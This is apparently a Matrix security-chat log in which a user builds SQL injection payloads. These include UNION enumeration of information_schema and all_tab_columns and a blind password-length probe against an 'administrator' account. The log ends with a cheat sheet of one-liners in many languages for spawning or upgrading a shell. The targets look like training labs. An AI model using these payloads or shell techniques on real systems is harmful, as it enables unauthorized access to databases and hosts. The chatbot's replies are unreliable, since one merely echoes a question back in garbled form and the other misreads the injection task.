22 Jul 2024 |
π HBπ | !tech here is my payload for sql injection: Gifts'+union+select+table_name,null+from+information_schema.tables-- . I need to figure out how to query column names from table pg_user using information_schema | 19:40:39 |
π HB|Funguy Bot | πFunguy Tech GPTπ ‡οΈClick Here To See Funguy's Responseβ€΅οΈ This is what I have tried so far:
sql
SELECT * FROM "pg_user" WHERE username = 'admin'; --
However, when I try to execute the above SQL statement, I get the following error message:
plaintext
ERROR: syntax error at or near "'admin'"
LINE 1: ...rname = ''admin'' LIMIT 20;
^
SQL state: 42601
Character: 53
Can someone please help me fix this? Thanks!
**Note: Please do not run any malicious payloads against databases or systems without explicit permission. Always test scripts in a controlled environment before deploying them into production.
| 19:40:46 |
π HBπ | ![Screenshot_20240722_134203.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/fd2c79dc3df239fa8e99959840f8f454eafacfad1815472409998786560?height=360&method=scale&width=360) Download Screenshot_20240722_134203.png | 19:42:07 |
π HBπ | But this is for mysql. postgre is different. | 19:44:00 |
π HBπ | ![Screenshot_20240722_134715.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/f0dfaae30a5fe94ccb23e44a820374f0535c35121815473723038236672?height=360&method=scale&width=360) Download Screenshot_20240722_134715.png | 19:47:20 |
π HBπ | Got it! | 19:47:21 |
π HBπ | ARGH! | 19:49:15 |
π HBπ | union select table_name,null from information_schema.tables-- | 19:49:32 |
π HBπ | ![Screenshot_20240722_134943.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/5c3fb16c264acf420b81ada65ee997bf500d2a411815474336539082752?height=360&method=scale&width=360) Download Screenshot_20240722_134943.png | 19:49:46 |
π HBπ | Admin isn't listed, and passwords are displayed hidden... hmm. | 19:49:56 |
π HBπ | users_ihlnyx It must be this table instead. | 19:54:33 |
π HBπ | These are obfuscated table names, interesting. | 19:55:49 |
π HBπ | users_ihlnyx
password_fualdp
username_oryime | 19:56:07 |
π HBπ | ![Screenshot_20240722_135651.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/e60c5a85f2e9ee59cc480a67e7ab1cce350190b11815476132783325184?height=360&method=scale&width=360) Download Screenshot_20240722_135651.png | 19:56:55 |
π HBπ | Here we go yo, here we go yo! | 19:57:01 |
π HBπ | Redacted or Malformed Event | 20:37:05 |
π HBπ | !tech I need to get all the column names from a USERS_OGLDOQ table in oracle. Here is my payload: 'Pets'+UNION+SELECT+null,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_OGLDOQ' but it's not working. What's wrong? | 20:37:59 |
π HB|Funguy Bot | πFunguy Tech GPTπ ‡οΈClick Here To See Funguy's Responseβ€΅οΈ Hello! I see you're trying to retrieve all column names from an Oracle database table named "USERS_OGLDOQ". Your current SQL query uses UNION and NULL values, which might not be the most effective way to accomplish this task. Instead, consider using the ALL_TAB_COLUMNS dictionary view provided by Oracle.
Here's how you can modify your query:
sql
SELECT COLUMN_NAME
FROM ALL_TAB_COLUMNS
WHERE TABLE_NAME = 'USERS_OGLDOQ';
This query directly retrieves all column names (column_names) from the specified table without needing to employ UNION or NULL values. Give it a try and let me know if it works for you!
| 20:38:04 |
23 Jul 2024 |
π HBπ | ![Screenshot_20240722_194041.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/5af1542723971748c4be7bff6c37432ee4e15e051815562661325176832?height=360&method=scale&width=360) Download Screenshot_20240722_194041.png | 01:40:45 |
π HBπ | ![Screenshot_20240722_194053.png](https://matrix.org/_matrix/media/r0/thumbnail/mozilla.org/2c4ea13e49da70548ee950d10cc74d5c1458a18d1815562711992369152?height=360&method=scale&width=360) Download Screenshot_20240722_194053.png | 01:40:56 |
π HBπ | Found a faster way to determine the number of chars in a password or username | 01:41:11 |
π HBπ | ' AND (SELECT LENGTH(password) FROM users WHERE username='administrator' LIMIT 1)='Β§9Β§ | 01:41:35 |
24 Jul 2024 |
π HBπ | BurpSuite community edition is too slow, and pro edition costs $449 USD. Wow. | 14:32:51 |
π HBπ | Also, good morning, folks, how's it going? | 14:32:58 |
25 Jul 2024 |
deknos82 | well, use and extend zap :) | 13:20:00 |
π HBπ | Oh ok | 16:34:41 |
π HBπ | Thanks | 16:34:42 |
26 Jul 2024 |
| @sky-mtrx:matrix.org joined the room. | 15:27:15 |
| @sky-mtrx:matrix.org left the room. | 19:45:04 |
27 Jul 2024 |
π HBπ | Spawning/Upgrading reverse shells
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
php -r 'system("/bin/bash -i");'
php -r '$p=proc_open("/bin/bash", [0=>["pipe","r"], 1=>["pipe","w"], 2=>["pipe","w"], 3=>["file", "/dev/tty", "r"], 4=>["file", "/dev/tty", "w"]], $pipes); foreach($pipes as $pipe) fclose($pipe); proc_close($p);'
`ruby -e 'exec "/bin/bash"'`
node -e 'require("child_process").spawn("/bin/bash", {stdio: "inherit"});'
perl -e 'exec "/bin/bash";'
Go:
`echo 'package main; import "os/exec"; func main() { cmd := exec.Command("/bin/bash"); cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr; cmd.Run() }' | go run -`
`/bin/bash -i`
`awk 'BEGIN { system("/bin/bash") }'`
`tclsh <<< 'exec /bin/bash'`
`lua -e 'os.execute("/bin/bash")'`
`runhaskell -e 'import System.Process; callCommand "/bin/bash"'`
| 01:59:56 |